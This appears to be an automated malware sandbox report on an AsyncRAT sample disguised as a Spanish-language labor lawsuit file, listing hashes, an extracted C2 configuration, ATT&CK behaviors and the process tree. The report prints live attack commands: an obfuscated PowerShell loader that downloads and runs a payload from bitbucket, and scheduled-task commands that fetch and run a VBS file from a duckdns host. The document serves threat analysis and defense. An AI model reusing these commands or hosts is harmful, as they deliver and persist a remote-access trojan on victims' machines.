Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
32 DEMNADA ...AL.exe
windows7-x64
102 DEMNADA ...AL.exe
windows10-2004-x64
102 DEMNADA ...32.dll
windows7-x64
32 DEMNADA ...32.dll
windows10-2004-x64
32 DEMNADA ...32.dll
windows7-x64
32 DEMNADA ...32.dll
windows10-2004-x64
32 DEMNADA ...ar.dll
windows7-x64
32 DEMNADA ...ar.dll
windows10-2004-x64
3Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
30/08/2024, 16:47
Static task
static1
Behavioral task
behavioral1
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/madHcNet32.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/madHcNet32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/mvrSettings32.dll
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/mvrSettings32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/unrar.dll
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/unrar.dll
Resource
win10v2004-20240802-en
General
-
Target
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
-
Size
3.1MB
-
MD5
b841d408448f2a07f308ced1589e7673
-
SHA1
f5b5095c0ed69d42110df6d39810d12b1fa32a1e
-
SHA256
69a90665113bd73b30360d87f7f6ed2c789a90a67f3b6e86474e21273a64f699
-
SHA512
a689734048109ab7bec9491bbb7781686c19c7885166b3ca2975e2f49e956fcc388cd8ca85a4e5a8bf9efe6056f1e0d80197b7f521d4f0d4cadb10ba9ef1fa93
-
SSDEEP
49152:pvFg5qg9BtIAHE3SM4ahx6LK2SamuZob+tCjNrv8:Jm5qGBHBLRKuZfkjNrv8
Malware Config
Extracted
https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
Default
enviasept.duckdns.org:3030
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2768 2800 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2660 2800 schtasks.exe 40 -
Blocklisted process makes network request 2 IoCs
flow pid Process 13 1716 powershell.exe 14 1716 powershell.exe -
pid Process 1788 powershell.exe 1716 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 12 bitbucket.org 13 bitbucket.org 14 bitbucket.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2500 set thread context of 2000 2500 1 DEMANADA LABORAL.exe 30 PID 2000 set thread context of 2628 2000 cmd.exe 33 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1 DEMANADA LABORAL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2768 schtasks.exe 2660 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2500 1 DEMANADA LABORAL.exe 2500 1 DEMANADA LABORAL.exe 2500 1 DEMANADA LABORAL.exe 2500 1 DEMANADA LABORAL.exe 2000 cmd.exe 2000 cmd.exe 1788 powershell.exe 2628 MSBuild.exe 1716 powershell.exe 2628 MSBuild.exe 2628 MSBuild.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2500 1 DEMANADA LABORAL.exe 2000 cmd.exe 2000 cmd.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2628 MSBuild.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2500 wrote to memory of 2000 2500 1 DEMANADA LABORAL.exe 30 PID 2500 wrote to memory of 2000 2500 1 DEMANADA LABORAL.exe 30 PID 2500 wrote to memory of 2000 2500 1 DEMANADA LABORAL.exe 30 PID 2500 wrote to memory of 2000 2500 1 DEMANADA LABORAL.exe 30 PID 2500 wrote to memory of 2000 2500 1 DEMANADA LABORAL.exe 30 PID 2000 wrote to memory of 2628 2000 cmd.exe 33 PID 2000 wrote to memory of 2628 2000 cmd.exe 33 PID 2000 wrote to memory of 2628 2000 cmd.exe 33 PID 2000 wrote to memory of 2628 2000 cmd.exe 33 PID 2000 wrote to memory of 2628 2000 cmd.exe 33 PID 2000 wrote to memory of 2628 2000 cmd.exe 33 PID 2628 wrote to memory of 768 2628 MSBuild.exe 35 PID 2628 wrote to memory of 768 2628 MSBuild.exe 35 PID 2628 wrote to memory of 768 2628 MSBuild.exe 35 PID 2628 wrote to memory of 768 2628 MSBuild.exe 35 PID 768 wrote to memory of 1788 768 WScript.exe 36 PID 768 wrote to memory of 1788 768 WScript.exe 36 PID 768 wrote to memory of 1788 768 WScript.exe 36 PID 768 wrote to memory of 1788 768 WScript.exe 36 PID 1788 wrote to memory of 1716 1788 powershell.exe 38 PID 1788 wrote to memory of 1716 1788 powershell.exe 38 PID 1788 wrote to memory of 1716 1788 powershell.exe 38 PID 1788 wrote to memory of 1716 1788 powershell.exe 38 PID 2628 wrote to memory of 2796 2628 MSBuild.exe 39 PID 2628 wrote to memory of 2796 2628 MSBuild.exe 39 PID 2628 wrote to memory of 2796 2628 MSBuild.exe 39 PID 2628 wrote to memory of 2796 2628 MSBuild.exe 39 PID 2628 wrote to memory of 2656 2628 MSBuild.exe 43 PID 2628 wrote to memory of 2656 2628 MSBuild.exe 43 PID 2628 wrote to memory of 2656 2628 MSBuild.exe 43 PID 2628 wrote to memory of 2656 2628 MSBuild.exe 43 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe"C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\riwmef.vbs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bi▒GU▒YwBs▒HY▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Gs▒YgB1▒G8▒aQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G4▒YQBn▒HI▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒YQBn▒HI▒b▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒LgBz▒HM▒bwBj▒G0▒ZQBy▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBy▒GY▒aQBk▒HY▒cgBl▒HM▒LwB0▒Gc▒ZwBn▒HI▒YQBj▒HM▒ZQBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒YgB1▒G8▒aQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBm▒GQ▒ZwBo▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bi▒GU▒YwBs▒HY▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\riwmef.vbs');powershell -command $KByHL;5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$beclv = '0';$kbuoi = 'C:\Users\Admin\AppData\Local\Temp\riwmef.vbs';[Byte[]] $nagrl = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($nagrl).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.ssocmer/sdaolnwod/rfidvres/tgggracsed/gro.tekcubtib//:sptth' , $kbuoi , '_____fdgh__________________-------------', $beclv, '1', 'Roda' ));"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lmsftv.wsf"4⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fybscp.wsf"4⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2768
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
780KB
MD55cc7800fabf041f4f6a02e2b5a4d5460
SHA1411b5973f756b375d1f587a5fd69c27a9b754510
SHA256ebf079a35687be6e9de0aad3adfb5a63f834ee93b6f7e5b7998b55fc75be1ee3
SHA5120864e631c778c2c8622eaa24b9cbf0dc15342474bba71a0b77b9ff3f5dbc2951407d1a21f0f94e58b41f9837644860154499442f03175821c2aad9509ec46358
-
Filesize
164KB
MD52e3704d10448cd561922b7561e6ec94c
SHA1fd831fdcb2e0dd360b4765466d5384a1b3fa3ac1
SHA2562b982915d800128a0149437f42684068a781e133ad607889f932fc9bec04b086
SHA512fc8f204d28ed1494894008b7417885a5df8b5fb99c99f56cf9a8deee935334759576d7b2b840d1c8b004d3e4c9ad27fe0036b1b7a4d806c5666d5c1acebb9852
-
Filesize
11.3MB
MD54195393370dff560c647cea03c986705
SHA17fcbf81466c0dc1760205570c1248f80466da3f9
SHA2567a82d66ac151f833b0b617777c883c9e02cf88d90b9394ec39ec6f80599e34e5
SHA5122a74330dea0b751b7096fff9e08deee5122e66c6e5febb94dd97dfc5c3f9d51614f6eb6057c7d2bdec64f9d24e744871a3a050c6f129b77e2e6b845d0c6f4f91
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5af3a6ecde36e623fe383608b58e8995a
SHA1cca2ee93a3153d8de2426b9c958883e500b42218
SHA256cc337f84cc15a7b6d9f6c76e68a505dd105dd40d7d86176dbce58684e50731d7
SHA5126433384a699d557c5bfde482adb29a90689db1460d832928bbf76fff5f3380b30eba43689d1a3624b2a26dc3100b1a0e5ad196c29d8e52f8fae95a27d04b6858